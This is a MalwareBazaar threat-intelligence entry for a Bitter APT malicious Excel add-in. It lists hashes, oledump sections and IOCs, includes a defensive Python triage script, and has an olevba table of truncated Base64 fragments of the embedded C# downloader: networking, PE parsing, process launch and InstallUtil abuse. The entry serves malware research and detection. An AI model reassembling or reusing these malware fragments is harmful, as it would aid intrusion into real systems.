MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Bitter
Vendor detections: 17
Maldoc score: 40


SHA256 hash: 259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207
SHA3-384 hash: b5c5740576559119020520b7674cc5dfe8f653827540ec64f9fca372f4da3593668eee9b8d77ba66e3ab450ebcb81e56
SHA1 hash: eb3032c062c9dc36100a4af9a501bc8fc118567d
MD5 hash: b165b489c5f8c4e136364664502d68f1
humanhash: idaho-colorado-black-lima
File name: Nominated Officials for the Conference.xlam
Signature: Bitter
File size: 67'425 bytes
First seen: 2025-10-11 08:27:39 UTC
Last seen: 2025-10-18 12:43:49 UTC
File type: Excel file xlsx (a container-level label: the .xlam extension denotes a macro-enabled Excel add-in, which is consistent with TrID's top match below and with the VBA project found by oledump)
MIME type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
ssdeep: 1536:qIPWYuaHRSxkveXmZhUgaUMLW7XRZYDOyMlDQKq/eT9lr:qIPWGH4xDSI+2KDQK0ebr
TLSH: T1636301CAC1A47953CA356BBF96D434D264A8BCD5D794E30435099017F34EE6F0F60ACA
TrID: 50.8% (.XLSM) Excel Microsoft Office Open XML Format document (with Macro) (57500/1/12)
      30.0% (.XLSX) Excel Microsoft Office Open XML Format document (34000/1/7)
      15.4% (.ZIP) Open Packaging Conventions container (17500/1/4)
      3.5% (.ZIP) ZIP compressed archive (4000/1)
Magika: xlsx
Reporter: smica83
Tags: apt Bitter xlsx

Office OLE Information


This sample is an Office document. The tables below give further detail on it, produced with oletools (oleid and olevba) and oledump.

OLE id
Maldoc score: 40
File Format is MS Excel 2007+
Container Format is OpenXML
Office document contains VBA Macros
OLE dump

MalwareBazaar identified 13 sections in this file using oledump (the entry lists 12 of them):

Section ID   Section size    Section name
A1              650 bytes    PROJECT
A2              104 bytes    PROJECTwm
A3              993 bytes    VBA/Sheet1
A4              993 bytes    VBA/Sheet2
A5              993 bytes    VBA/Sheet3
A6           107545 bytes    VBA/ThisWorkbook
A7            10093 bytes    VBA/_VBA_PROJECT
A8             1657 bytes    VBA/__SRP_0
A9              114 bytes    VBA/__SRP_1
A10             448 bytes    VBA/__SRP_2
A11             256 bytes    VBA/__SRP_3
A12             826 bytes    VBA/dir
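The oleid and oledump results above rest on one structural fact: an OOXML workbook is a ZIP package, and its VBA project is a single OLE (CFBF) stream, xl/vbaProject.bin, declared in [Content_Types].xml with the content type application/vnd.ms-office.vbaProject. The Python below is an added example (not MalwareBazaar's or oletools' code) that performs this first triage step with the standard library alone: it checks for the vbaProject part and its content type, verifies the OLE magic, and reads the main part's content type to tell a macro-enabled add-in (.xlam) from a plain .xlsx. The two workbooks it inspects are constructed in memory; the content types used are the real OOXML ones.

```python
"""Triage an OOXML Excel package (.xlam/.xlsm/.xlsx) for an embedded VBA project.

Added example using only the standard library; the sample packages are
constructed below so the script runs offline.
"""
import io
import re
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # CFBF header that starts vbaProject.bin


def triage_ooxml(data: bytes) -> dict:
    """Return findings for one OOXML package given as bytes."""
    findings = {"is_zip": False, "has_vba_part": False, "vba_content_type": False,
                "vba_is_ole": False, "macro_enabled_main_part": None, "parts": []}
    if not data.startswith(b"PK\x03\x04"):
        return findings
    findings["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        findings["parts"] = names
        # Match any vbaProject.bin, not only xl/ (Word uses word/, PowerPoint ppt/).
        vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
        findings["has_vba_part"] = bool(vba_parts)
        if "[Content_Types].xml" in names:
            ct = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            findings["vba_content_type"] = VBA_CONTENT_TYPE in ct
            # The workbook part's content type separates macro-enabled formats from plain xlsx.
            m = re.search(r'PartName="/xl/workbook\.xml"[^>]*ContentType="([^"]+)"', ct)
            if m:
                main_ct = m.group(1)
                findings["macro_enabled_main_part"] = "macroEnabled" in main_ct or "addin" in main_ct
        if vba_parts:
            findings["vba_is_ole"] = zf.read(vba_parts[0]).startswith(OLE_MAGIC)
    return findings


def verdict(findings: dict) -> str:
    """Short label a triage queue can route on."""
    if not findings["is_zip"]:
        return "not-ooxml"
    if findings["has_vba_part"] and findings["vba_is_ole"]:
        return "macro-container"
    if findings["has_vba_part"] or findings["vba_content_type"]:
        return "declares-vba-but-malformed"
    return "no-macros"


def build_sample(with_vba: bool) -> bytes:
    """Constructed minimal package for the demo; not a real workbook."""
    main_ct = ("application/vnd.ms-excel.addin.macroEnabled.main+xml" if with_vba
               else "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml")
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/xl/workbook.xml" ContentType="{main_ct}"/>'
        + (f'<Override PartName="/xl/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>' if with_vba else "")
        + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            zf.writestr("xl/vbaProject.bin", OLE_MAGIC + b"\x00" * 504)  # header sector only
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        f = triage_ooxml(build_sample(flag))
        print(verdict(f), f["macro_enabled_main_part"], f["parts"])
```

Real analysis continues with oledump and olevba on the extracted stream; this check is what lets a pipeline route the file there, and it catches the case shown on this page where the container-level label (xlsx) and the extension (.xlam) disagree.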
OLE vba

MalwareBazaar extracted the following information from the VBA project embedded in this file using olevba. Each row gives the finding type, the keyword (for Base64 rows, a fragment of the decoded text) and a description (for Base64 and String rows, the start of the encoded string). Read together, the decoded fragments are C# source (namespace Coyote; HttpWebRequest and ServicePointManager networking; IMAGE_DOS_HEADER and IMAGE_NT_HEADERS PE parsing; a System.Configuration.Install.Installer subclass marked RunInstaller), which matches the csc.exe and InstallUtil.exe IOCs listed after the table and the csc.exe / InstallUtil.exe process tree in the sandbox report further down.

Type        Keyword          Description
AutoExec    Workbook_Open    Runs when the Excel Workbook is opened
Base64rivate boolprivate bool bU publprivat return apublic voidCoyoteCompute ifcml2YXRlIGJvb2wgYkluaXRpYWxpc2VkID0gZmFsc2U7I
Base64public bool Useful getIA0KDQoJCXB1YmxpYyBib29sIFVzZWZ1bA0KCQl7ICAgD
Base64tstringdA0KICAgICAgICAgICAgICAgIHN0cmluZyBheHggPSBna
Base64 return setCgkJCQlyZXR1cm4gYlVzZWZ1bDsNCgkJCX0gICANCgkJC
Base64public partial classcHVibGljIHBhcnRpYWwgY2xhc3MgTWFpbldpbmRvdw0KI
Base64q-------------------ow.Ticks.ToStrcS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0iICsgRGF0Z
Base64HttpWebRequestrequest.ICAgICAgICAgICAgICAgIEh0dHBXZWJSZXF1ZXN0IHJlc
Base64t ushortdCB1c2hvcnQgSU1BR0VfRE9TX1NJR05BVFVSRSA9IDB4N
Base64 const uintIGNvbnN0IHVpbnQgSU1BR0VfTlRfU0lHTkFUVVJFID0gM
Base645IOX1q2/nikT0cEHgCPfNUlPWDFxMi9uaWtUMGNFSGdDUGZiRlNjbnd2T3VtL1V4T
Base64 const ushortDQogICAgICAgIGNvbnN0IHVzaG9ydCBJTUFHRV9GSUxFX
Base64request.ContentTyperequest.KeepArequestStrICAgICAgICAgICByZXF1ZXN0LkNvbnRlbnRUeXBlID0gI
Base64// striICAgICAgICAgICAgICAgICAgICByZXF1ZXN0U3RyZWFtL
Base64ng formDataTemplatevx8GpAIgHbD3WvbmcgZm9ybURhdGFUZW1wbGF0ZSA9IGdqZmRrZ2l0amtnK
Base64XlxzFivquiNM6uAG13ApqCtTVey7VmIUyqWGx4ekZpdnF1aU5NNnVBRzEzQXBLSHV2TDFNLytUY2RSa
Base64IMAGE_FILE_MACHINE_AAMD64SU1BR0VfRklMRV9NQUNISU5FX0FNRDY0ID0gMHg4NjY0O
Base64n/ITaeTKg2g4Na8uWrAmz6rPOP6g2Xu3rHbi9JVGFlVEtnMmc0TmE4dVdyQW1sNjFSSlZKdzh2K0F5a
Base64 const ushort IMAGE_IGNvbnN0IHVzaG9ydCBJTUFHRV9OVF9PUFRJT05BTF9IR
Base64AN5iHJrjkwU/enaNub8JDisposition: fQU41aUhKcmprd1UvZW5hTnViOEpwL3c9PSIpOy8vICJDb
Base64 stringDisposition: forICAgc3RyaW5nIGZvcm1EYXRhVGVtcGxhdGUgPSAiQ29ud
Base64/ PE32LyBQRTMyDQogICAgICAgIGNvbnN0IHVzaG9ydCBJTUFHR
Base64ncoding.UTF8.GetByteformItemBytes.LeEncoding.bmNvZGluZy5VVEY4LkdldEJ5dGVzKGZvcm1JdGVtKTsNC
Base64 requeICAgICAgICAgICAgICAgcmVxdWVzdFN0cmVhbS5Xcml0Z
Base64ebResponse responseZWJSZXNwb25zZSByZXNwb25zZSA9IHJlcXVlc3QuR2V0U
Base64 static static striCiAgICAgICAgc3RhdGljIHN0cmluZyBteW5tID0gIiI7D
Base64 usingICAgICAgICB1c2luZyAoU3RyZWFtUmVhZGVyIHJlYWRlc
Base64 static stringICAgc3RhdGljIHN0cmluZyBtYmlzID0gIiI7DQoNCiAgI
Base64response.GetResponsecmVzcG9uc2UuR2V0UmVzcG9uc2VTdHJlYW0oKSkpDQogI
Base64 static staticprivate st pDQogICAgICAgIHN0YXRpYyBSYW5kb20gcmQ7DQogICAgI
Base64string responseTextRemoveSpecialCharequest.AbICAgICAgICAgICAgICAgICBzdHJpbmcgcmVzcG9uc2VUZ
Base64ublic static stringdWJsaWMgc3RhdGljIHN0cmluZyBSZW1vdmVTcGVjaWFsQ
Base64 Thread myNewThreadtaskprogressAsICBUaHJlYWQgbXlOZXdUaHJlYWQgPSBuZXcgVGhyZWFkK
Base64 else ifICAgICAgICAgICBlbHNlIGlmIChjID09ICcjJyAmJiBjb
Base64ortant bitonentModel.RunInstalb3J0YW50IGJpdA0KDQoJW1N5c3RlbS5Db21wb25lbnRNb
Base64bool IsNullOrWhiteSp iYm9vbCBJc051bGxPcldoaXRlU3BhY2UoU3RyaW5nIHZhb
Base64ll.Installerprivate staticstring Base64Decode varbase64Encodedbase64EncodedDbGwuSW5zdGFsbGVyDQoJew0KCQlwcml2YXRlIHN0YXRpY
Base64 public staticICAgICAgcHVibGljIHN0YXRpYyBzdHJpbmcgZ2pmZGtna
Base64 plaintexkeCgkJCQlwbGFpbnRleHQuQXBwZW5kKChjaGFyKSgodWlud
Base64kgahslKDSJDLiuohaSKs stringEncrypt cia2dhaHNsS0RTSkRMaXVvaGFTS3NrYWxzIjsNCiAgICAgI
Base64return plaintext.ToSpublic overrCQlyZXR1cm4gcGxhaW50ZXh0LlRvU3RyaW5nKCk7DQoJC
Base64 cs.WrcipherBytes.LeICAgICAgICAgICAgICAgY3MuV3JpdGUoY2lwaGVyQnl0Z
Base64 trystring queICAgICAgICB0cnkNCiAgICAgICAgICAgIHsNCiAgICAgI
Base64 ManagemenICAgICAgICAgICBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZ
Base64nagementObjectSearchbmFnZW1lbnRPYmplY3RTZWFyY2hlcik7DQogICAgICAgI
Base64ManagementObjectSear foreTWFuYWdlbWVudE9iamVjdFNlYXJjaGVyKHF1ZXJ5KTsNC
Base64 tryICAgICAgICAgIHRyeQ0KICAgICAgICAgICAgICAgIHsNC
Base64ManagementObjectSearKwwDqlCjADdIRpTWFuYWdlbWVudE9iamVjdFNlYXJjaGVyIG9iak9TID0gZ
Base64lsyMxzrKTsD4xnQnhVBsbHN5TXh6cktUc0Q0eG5RbmhWQnM9IikgKyBsb2NhdGlvb
Base64jMgmt in return return staticIMAGE_DOS_HEADER Get strea returnReadSak1nbXQgaW4gb2JqT1MuR2V0KCkpDQogICAgICAgICAgI
Base64 static IMAGECg0KICAgICAgICBzdGF0aWMgSU1BR0VfTlRfSEVBREVSU
Base64 staticICAgICBzdGF0aWMgSU1BR0VfTlRfSEVBREVSUzMyIEdld
Base64 return RIMAGE_NT_HEA staticIMAGE_NTDQogICAgICAgICAgICByZXR1cm4gUmVhZFN0cnVjdEZyb
Base64_HEADERS64IMAGE_DOS_HEAD returnX0hFQURFUlM2NCBHZXROdEhlYWRlcjY0KFN0cmVhbSBzd
Base64 ReadStructFromStreaIFJlYWRTdHJ1Y3RGcm9tU3RyZWFtPElNQUdFX05UX0hFQ
Base64ader.OptionalHeader.TIONAL_HDR32_M static boolYWRlci5PcHRpb25hbEhlYWRlci5NYWdpYyA9PSBJTUFHR
Base64MAGE_NT_HEADERS64 reTUFHRV9OVF9IRUFERVJTNjQgbnRIZWFkZXIpDQogICAgI
Base64turn ntHeader.OptionIMAGE_NT_OPTIONA static TReadStru tryMarshal.AllocCodHVybiBudEhlYWRlci5PcHRpb25hbEhlYWRlci5NYWdpY
Base64new InvalidOperation MabmV3IEludmFsaWRPcGVyYXRpb25FeGNlcHRpb24oKTsNC
Base64 Marsh publicstatic bool IsValiICAgICAgICAgICAgICAgTWFyc2hhbC5GcmVlQ29UYXNrT
Base64ERS_COMMON ntHeaderRVJTX0NPTU1PTiBudEhlYWRlciA9IEdldENvbW1vbk50S
Base64 returnICAgICAgICAgcmV0dXJuIGZhbHNlOw0KDQogICAgICAgI
Base64ntHeader.FileHeader.bnRIZWFkZXIuRmlsZUhlYWRlci5NYWNoaW5lKQ0KICAgI
Base64 case IMAGE_FILE_MICAgICAgICAgICAgICAgICAgICAgICBjYXNlIElNQUdFX
Base64 returnICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJldHVyb
Base64 case IMAGE_FILE_MAICBjYXNlIElNQUdFX0ZJTEVfTUFDSElORV9JQTY0Og0KI
Base64 return IsVanvalidOperationExcepICAgICAgICAgcmV0dXJuIElzVmFsaWRFeGU2NChHZXROd
Base64etFileNameWithoutExtZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24oZmlsZXBhd
Base64 doICBkbw0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgI
Base64 return //pDQogICAgICAgICAgICByZXR1cm4gZmlsZXBhdGg7DQogI
Base64ublic static async // var // va /dWJsaWMgc3RhdGljIGFzeW5jIFRhc2s8c3RyaW5nPiBEb
Base64/ bool //LyAgICAgICAgYm9vbCBoYXNQcm9ncmVzQ2hhbmdlZCA9I
Base64voiddm9pZCB0aW1lckhhbmRsZXIob2JqZWN0IHMsIEVsYXBzZ
Base64 //ICAgICAgIC8vICAgICAgICAgICAgaWYgKGhhc1Byb2dyZ
Base64eZQ0KICAgICAgICAvLyAgICAgICAgICAgIHsNCiAgICAgI
Base64 //DQogICAgICAgIC8vICAgICAgICAgICAgfQ0KICAgICAgI
Base64 // voidICAvLyAgICAgICAgdm9pZCBDbGVhblJlc291cmNlcygpD
Base64 // //ICAgICAgIC8vICAgICAgICBjYXRjaCAoRXhjZXB0aW9uI
Base64 return await staICAgIHJldHVybiBhd2FpdCB0Y3MuVGFzazsNCiAgICAgI
Base64tic private booldGljIHByaXZhdGUgYm9vbCBnamZka2dpdGprZygpDQogI
Base64 Process tryIFByb2Nlc3MgcmVxdWVzdFByb2Nlc3MgPSBuZXcgUHJvY
Base64 requCiAgICAgICAgICAgICAgICByZXF1ZXN0UHJvY2Vzcy5Td
Base64s.StartInfo.FileNamecy5TdGFydEluZm8uRmlsZU5hbWUgPSBwX2dsb2JsZTsvL
Base64 requestProcICAgICAgICAgcmVxdWVzdFByb2Nlc3MuU3RhcnRJbmZvL
Base64requestProcess.Start ifcmVxdWVzdFByb2Nlc3MuU3RhcnQoKSAtLSAwIik7DQogI
Base64 //Debug.WritrequestProcess returnsucc staticprivate async Tasktas trICAgICAgICAvL0RlYnVnLldyaXRlTGluZSgiZ2pmZGtna
Base64yeQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgI
Base64t.SpecialFolder.AppldC5TcGVjaWFsRm9sZGVyLkFwcGxpY2F0aW9uRGF0YSkgK
Base64ronment.GetFolderPatlFolder.Commoncm9ubWVudC5HZXRGb2xkZXJQYXRoKEVudmlyb25tZW50L
Base64lt:Environment.SpbHQ6DQogICAgICAgICAgICAgICAgICAgICAgICB7DQogI
Base64ecialFolder.ApplicatZWNpYWxGb2xkZXIuQXBwbGljYXRpb25EYXRhKSArICJcX
Base64ntManager.ServerCertbnRNYW5hZ2VyLlNlcnZlckNlcnRpZmljYXRlVmFsaWRhd
Base64nager.Expect100ContiServibmFnZXIuRXhwZWN0MTAwQ29udGludWUgPSB0cnVlOw0KI
Base64cePointManager.SecurSecurityProtocolTypeY2VQb2ludE1hbmFnZXIuU2VjdXJpdHlQcm90b2NvbCA9I
Base64.TlsLlRscw0KICAgICAgICAgICAgICAgICAgICAgICB8IFNlY
Base64s11czExDQogICAgICAgICAgICAgICAgICAgICAgIHwgU2Vjd
Base6412MTINCiAgICAgICAgICAgICAgICAgICAgICAgfCBTZWN1c
Base64FA3wdvGYiv/k1y9oLsJrRkEzd2R2R1lpdi9rMXk5b0xzSnJYUThDd29vaTJjRjZBc
Base64nKgkHRqEpzABSkE8VWIlbktna0hScUVwekFCU2tFOFZXSWxhbTQ3cWhQWjdpY3pzN
Base64iC1to413bIeL/tTS3GKhaUMxdG80MTNiSWVML3RUUzNHS2g1dFQ4OXMxRWduYlJWO
Base64engCmaO/M70IHZBIXPdUZW5nQ21hTy9NNzBJSFpCSVhQZFVDeUtPL2UyREdLeExQd
Base64 usingICAgIHVzaW5nIChIdHRwQ2xpZW50IGNsaWVudCA9IG5ld
Base64Runtime.InteropServiusing System.Security.CryptoUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTe
Base64HttpResponseMessage rICAgICAgICAgICAgICAgSHR0cFJlc3BvbnNlTWVzc2FnZ
Base64space Coyotec3BhY2UgQ295b3RlDQp7DQoJW1N0cnVjdExheW91dChMY
Base64esponse.EnsureSuccesZXNwb25zZS5FbnN1cmVTdWNjZXNzU3RhdHVzQ29kZSgpO
Base64 // Try toICAgICAgICAvLyBUcnkgdG8gZ2V0IGZpbGVuYW1lIGZyb
Base64n headerbiBoZWFkZXINCg0KDQogICAgICAgICAgICAgICAgICAgI
Base64tent.Headers.ContentdGVudC5IZWFkZXJzLkNvbnRlbnREaXNwb3NpdGlvbiAhP
Base64 public// Minimum extra parICAgICAgICBwdWJsaWMgdXNob3J0IGVfbWluYWxsb2M7I
Base64 string fileNameICAgICBzdHJpbmcgZmlsZU5hbWUgPSBudWxsOw0KICAgI
Base64agraphs neededYWdyYXBocyBuZWVkZWQNCiAgICAgICAgcHVibGljIHVza
Base64aximum extraYXhpbXVtIGV4dHJhIHBhcmFncmFwaHMgbmVlZGVkDQogI
Base64ontentDisposition.Fib250ZW50RGlzcG9zaXRpb24uRmlsZU5hbWU7DQogICAgI
Base64 // p_gICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgI
Base64 //ICAgICAgICAgICAgICAgICAgLy8gU2F2ZSB0aGUgcmVzc
Base64 public ushortaddress of reloICAgICBwdWJsaWMgdXNob3J0IGVfbGZhcmxjOyAgIC8vI
Base64cation tableY2F0aW9uIHRhYmxlDQogICAgICAgIHB1YmxpYyB1c2hvc
Base64response.Content.ReacmVzcG9uc2UuQ29udGVudC5SZWFkQXNTdHJlYW1Bc3luY
Base64 usingICAgICAgICAgdXNpbmcgKEZpbGVTdHJlYW0gZnMgPSBuZ
Base64rlay numbercmxheSBudW1iZXINCiAgICAgICAgcHVibGljIHVpbnQgZ
Base64 await stream.Copycatcstring cSystem.IOICAgYXdhaXQgc3RyZWFtLkNvcHlUb0FzeW5jKGZzKTsNC
Base64 System.BuffICAgICAgICAgU3lzdGVtLkJ1ZmZlci5CbG9ja0NvcHkoY
Base64rvedcnZlZA0KICAgICAgICBwdWJsaWMgdWludCBlX3JlczI7I
Base64 stringSystem.IO.Path.ChanaIbETxENCwM1KQICAgICAgICBzdHJpbmcgcF9nbG9ibGUxID0gc3BhdGggK
Base64 public ushortICAgICAgIHB1YmxpYyB1c2hvcnQgZV9vZW1pZDsgICAgL
Base64 //ifICAgICAgICAgICAvL2lmICh0LklzQ29tcGxldGVkID09I
Base64 // ReservedICAgICAvLyBSZXNlcnZlZA0KICAgICAgICBwdWJsaWMgd
Base64 ReservedIFJlc2VydmVkDQogICAgICAgIHB1YmxpYyB1aW50IGVfc
Base64 // codeICAgICAgICAgICAgLy8gY29kZSA9ICIwMDBCIjsNCiAgI
Base64edZWQNCiAgICAgICAgcHVibGljIHVpbnQgZV9yZXM3OyAgI
Base64 stringICAgICAgICAgICAgc3RyaW5nIGZoZ2xoID0gZ2pmZGtna
Base64 public intFile address of newICAgICBwdWJsaWMgaW50IGVfbGZhbmV3OyAgICAgIC8vI
Base64iv/k1y9oLsJrXQ8Cwooi5I6sw8nKgkHRqEaXYvazF5OW9Mc0pyWFE4Q3dvb2kyY0Y2QXEyelpUQU5tK
Base64exe headeryoutKind.SequenZXhlIGhlYWRlcg0KICAgIH0NCiAgICBbU3RydWN0TGF5b
Base64pzABSkE8VWIlam47qhPZcHpBQlNrRThWV0lsYW00N3FoUFo3aWN6czVuWFZXaUNCY
Base64ublic ushort publicushort NumberOfSdWJsaWMgdXNob3J0IE1hY2hpbmU7DQogICAgICAgIHB1Y
Base64bIeL/tTS3GKh5tT89s1E6F4HBkF0ThwWGN i catYkllTC90VFMzR0toNXRUODlzMUVnbmJSVjhvR1Q4NytiS
Base64public uint PointerT public uintcHVibGljIHVpbnQgUG9pbnRlclRvU3ltYm9sVGFibGU7D
Base64erCertificateValidatZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjayA9I
Base64ct IMAGE_OPTIONAL_HEY3QgSU1BR0VfT1BUSU9OQUxfSEVBREVSMzINCiAgICB7D
Base64 public byte publicICAgICAgcHVibGljIGJ5dGUgTWlub3JMaW5rZXJWZXJza
Base64 Secur
Base64 public uint publICAgICAgICBwdWJsaWMgdWludCBBZGRyZXNzT2ZFbnRye
Base64 public uint public uintSeICAgICAgICBwdWJsaWMgdWludCBJbWFnZUJhc2U7DQogI
Base64 public ushort MICAgICBwdWJsaWMgdXNob3J0IE1pbm9yT3BlcmF0aW5nU
Base64 HttpWebRequestICAgICAgSHR0cFdlYlJlcXVlc3QgcmVxdWVzdCA9IChId
Base64 //ICAgICAgICAgICAgICAgLy8gcmVxdWVzdC5Db250ZW50V
Base64 public ushort public usICAgcHVibGljIHVzaG9ydCBNYWpvckltYWdlVmVyc2lvb
Base64hort publicushort MajorSuaG9ydCBNaW5vckltYWdlVmVyc2lvbjsNCiAgICAgICAgc
Base64HXuWAGqqkgTsX/mLUGgsSFh1V0FHcXFrZ1RzWC9tTFVHZ3N6SXgvaVVJcW1XdW81c
Base64 public uint public uintSizeOICAgcHVibGljIHVpbnQgU2l6ZU9mSW1hZ2U7DQogICAgI
Base64/nikT0cEHgCPfbFScnwvL25pa1QwY0VIZ0NQZmJGU2Nud3ZPdW0vVXhOOW5aUT09I
Base64request.ContentTypeICAgIHJlcXVlc3QuQ29udGVudFR5cGUgPSAibXVsdGlwY
Base64equest.GetRequestStrZXF1ZXN0LkdldFJlcXVlc3RTdHJlYW0oKSkNCiAgICAgI
Base64 public uint public uICAgICAgcHVibGljIHVpbnQgU2l6ZU9mU3RhY2tDb21ta
Base64 requestICAgICAgICAgICAgIHJlcXVlc3RTdHJlYW0uV3JpdGUoY
Base64int public uintSizeOfHeapaW50IFNpemVPZkhlYXBSZXNlcnZlOw0KICAgICAgICBwd
Base64quiNM6uAG13ApKHuvL1M7VmIUyqn/ITaeTcXVpTk02dUFHMTNBcEtIdXZMMU0vK1RjZFJrV1ZhOHovc
Base64lic uint structIMAGE_OPTIONAL_HbGljIHVpbnQgTnVtYmVyT2ZSdmFBbmRTaXplczsNCiAgI
Base64Kg2g4Na8uWrAml61RJVJg2Xu3rHAN5iHJrDisposition: form-datstS2cyZzROYTh1V3JBbWw2MVJKVkp3OHYrQXloVVNIWlM3e
Base64EADER64 publicRUFERVI2NA0KICAgIHsNCiAgICAgICAgcHVibGljIHVza
Base64ringDisposition: form-datstrirequescmluZyBmb3JtRGF0YVRlbXBsYXRlID0gIkNvbnRlbnQtR
Base64public byte public byteMcHVibGljIGJ5dGUgTWFqb3JMaW5rZXJWZXJzaW9uOw0KI
Base64 public uint SICAgICAgIHB1YmxpYyB1aW50IFNpemVPZkluaXRpYWxpe
Base64 requestStretrailer.LengtICAgICAgICAgcmVxdWVzdFN0cmVhbS5Xcml0ZSh0cmFpb
Base64 usingICB1c2luZyAoU3RyZWFtUmVhZGVyIHJlYWRlciA9IG5ld
Base64lic uint SizeOfUnini public uintbGljIHVpbnQgU2l6ZU9mVW5pbml0aWFsaXplZERhdGE7D
Base64se.GetResponseStreamc2UuR2V0UmVzcG9uc2VTdHJlYW0oKSkpDQogICAgICAgI
Base64 public ulong public uintDQogICAgICAgIHB1YmxpYyB1bG9uZyBJbWFnZUJhc2U7D
Base64 stringICAgICAgICAgICBzdHJpbmcgcmVzcG9uc2VUZXh0ID0gc
Base64 publicDQogICAgICAgIHB1YmxpYyB1c2hvcnQgTWFqb3JPcGVyY
Base64 public ushort publicICAgICAgcHVibGljIHVzaG9ydCBNYWpvckltYWdlVmVyc
Base64 ushort publicushort MajoIHVzaG9ydCBNaW5vckltYWdlVmVyc2lvbjsNCiAgICAgI
Base646HuoLAYhYHSz6HTZTmLYOSArchitectureNkh1b0xBWWhZSFN6NkhUWlRtTFlZa2FubnYiKSwgbnVsb
Base64 public uint public uintSiICAgICAgcHVibGljIHVpbnQgU2l6ZU9mSW1hZ2U7DQogI
Base64 System.IO.Path.CombwCZFw4ZjLxXShrtryIFN5c3RlbS5JTy5QYXRoLkNvbWJpbmUoU3lzdGVtLklPL
Base64 File.WriteICAgICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KGZuYW1lL
Base64ublic ushort publicushort DllChardWJsaWMgdXNob3J0IFN1YnN5c3RlbTsNCiAgICAgICAgc
Base64 catchICAgICBjYXRjaCAoRXhjZXB0aW9uIGV4KQ0KICAgICAgI
Base64ServicePointManager.U2VydmljZVBvaW50TWFuYWdlci5TZXJ2ZXJDZXJ0aWZpY
Base64 public ulong pubDQogICAgICAgIHB1YmxpYyB1bG9uZyBTaXplT2ZTdGFja
Base64lic ulong public ulongSizbGljIHVsb25nIFNpemVPZkhlYXBSZXNlcnZlOw0KICAgI
Base64icePointManager.ExpeaWNlUG9pbnRNYW5hZ2VyLkV4cGVjdDEwMENvbnRpbnVlI
Base64 public uint struct IMAGE_NT_ICAgIHB1YmxpYyB1aW50IE51bWJlck9mUnZhQW5kU2l6Z
Base64 ServicePointManICAgICBTZXJ2aWNlUG9pbnRNYW5hZ2VyLlNlY3VyaXR5U
Base64HEADERS_COMMON public uintSEVBREVSU19DT01NT04NCiAgICB7DQogICAgICAgIHB1Y
Base64otocolType.Tlsb3RvY29sVHlwZS5UbHMNCiAgICAgICAgICAgICAgICAgI
Base64t IMAGE_NT_HEADERS32 public uintSignadCBJTUFHRV9OVF9IRUFERVJTMzINCiAgICB7DQogICAgI
Base64colType.Tls11Y29sVHlwZS5UbHMxMQ0KICAgICAgICAgICAgICAgICAgI
Base64olType.Tls12b2xUeXBlLlRsczEyDQogICAgICAgICAgICAgICAgICAgI
Base64 public IMAGE_ICAgICAgIHB1YmxpYyBJTUFHRV9PUFRJT05BTF9IRUFER
Base64sJrXQ8Cwooi2cF6Aq2zZkHRqEpzABSkE8Vc0pyWFE4Q3dvb2kyY0Y2QXEyelpUQU5tK2NoRDFmcDVJN
Base64 structICAgc3RydWN0IElNQUdFX05UX0hFQURFUlM2NA0KICAgI
Base64WIlam47qhPZ7iczs5nXVV0lsYW00N3FoUFo3aWN6czVuWFZXaUNCYWNsSzhsdkE3c
Base64GKh5tT89s1EgnbRV8oAPR0toNXRUODlzMUVnbmJSVjhvQVBDcnVFWVpLOU1DZzVIb
IOC         kefe.bat           Executable file name
IOC         csc.exe            Executable file name
IOC         msoffice365.dll    Executable file name
IOC         Http.dll           Executable file name
IOC         vlcplayer.dll      Executable file name
IOC         InstallUtil.exe    Executable file name
String// Replace with yourserver endpoinCB5b3VyIHNlcnZlciBlbmRwb2lu
Stringstring f--axxyyppqCAgICAgICAgICAgIHN0cmluZyBm
StringMainWindow consCAgIHsNCg0KICAgICAgICBjb25z
String //regjfdkgi29udGVudFR5cGUgPSBnamZka2dp
StringIMAGE_DOS_SIGNATUREUE0RDsgIC8vIE1aDQogICAgICAg
String/mLUGgszIx/iUIqmWuo5pKgTYkEX/fUbu5XFtV3VvNXBLZ1RZa0VYL2ZVYnU1
StringIMAGE_FILE_MACHINE_I01BQ0hJTkVfSTM4NiA9IDB4MDE0
String const ushortIMAGE_FILE_MACH2hvcnQgSU1BR0VfRklMRV9NQUNI
String// Intel 64 const ushortCAgICAgICBjb25zdCB1c2hvcnQg
StringNT_OPTIONAL_HDR32_MAFIzMl9NQUdJQyA9IDB4MTBCOyAv
String const ushortIMAGE_NT_OPTIONAL_HDR64_M const ushortIMAGE_FV9OVF9PUFRJT05BTF9IRFI2NF9N
String staticWMgc3RyaW5nIG1pZGkgPSAiIjsN
